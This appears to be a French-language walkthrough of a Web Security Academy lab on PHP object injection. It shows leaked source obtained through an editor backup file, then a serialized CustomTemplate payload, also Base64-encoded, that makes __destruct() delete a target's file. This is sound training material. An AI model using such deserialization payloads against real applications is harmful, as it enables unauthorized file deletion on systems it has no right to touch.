Injection d’objets arbitraires en PHP

Arbitrary object injection in PHP

Lab: Arbitrary object injection in PHP | Web Security AcademyWebSecAcademy

Description du laboratoire

Ce laboratoire utilise un mécanisme de session basé sur la sérialisation PHP et est vulnérable à une injection d’objets arbitraires. L’objectif est de fabriquer et injecter un objet sérialisé malveillant afin de supprimer le fichier morale.txt situé dans le répertoire personnel de Carlos.

Identifiants fournis :

Utilisateur : wiener
Mot de passe : peter

Connexion et observation de la session

Après connexion avec les identifiants fournis, une cookie de session est définie. Son contenu est un objet PHP sérialisé de type User, par exemple :

O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"v2rpyke9b13ypl302bxc74cerzpnp8st";}

Cela confirme que l’application désérialise directement des objets PHP contrôlables par l’utilisateur.

Accès au code source

Dans le code HTML de l’application, un commentaire attire l’attention :

 <!-- TODO: Refactor once /libs/CustomTemplate.php is updated -->

L’accès direct au fichier /libs/CustomTemplate.php ne retourne rien.

Cependant, en utilisant une sauvegarde d’éditeur (suffixe ~) :

on obtient le code source PHP.

<?php

class CustomTemplate {
    private $template_file_path;
    private $lock_file_path;

    public function __construct($template_file_path) {
        $this->template_file_path = $template_file_path;
        $this->lock_file_path = $template_file_path . ".lock";
    }

    private function isTemplateLocked() {
        return file_exists($this->lock_file_path);
    }

    public function getTemplate() {
        return file_get_contents($this->template_file_path);
    }

    public function saveTemplate($template) {
        if (!isTemplateLocked()) {
            if (file_put_contents($this->lock_file_path, "") === false) {
                throw new Exception("Could not write to " . $this->lock_file_path);
            }
            if (file_put_contents($this->template_file_path, $template) === false) {
                throw new Exception("Could not write to " . $this->template_file_path);
            }
        }
    }

    function __destruct() {
        // Carlos thought this would be a good idea
        if (file_exists($this->lock_file_path)) {
            unlink($this->lock_file_path);
        }
    }
}

?>

Analyse de la classe vulnérable

La classe CustomTemplate contient notamment :

Deux attributs privés :
- $template_file_path
- $lock_file_path
Une méthode magique __destruct() qui exécute :

if (file_exists($this->lock_file_path)) {
    unlink($this->lock_file_path);
}

Cela signifie que lors de la destruction de l’objet, n’importe quel fichier dont le chemin est stocké dans lock_file_path peut être supprimé

Exploitation via désérialisation

Comme l’application désérialise des objets PHP issus de la session, il est possible de :

Créer manuellement un objet CustomTemplate
Contrôler directement la valeur de lock_file_path
Forcer la suppression du fichier ciblé lors de l’appel automatique à __destruct()

Objet sérialisé malveillant :

O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}

Encodage Base64

Pour l’injecter dans la cookie de session, l’objet est encodé en Base64 :

TzoxNDoiQ3VzdG9tVGVtcGxhdGUiOjE6e3M6MTQ6ImxvY2tfZmlsZV9wYXRoIjtzOjIzOiIvaG9tZS9jYXJsb3MvbW9yYWxlLnR4dCI7fQ==

Mis à jour il y a 2 mois

hashtagArbitrary object injection in PHP

Arbitrary object injection in PHP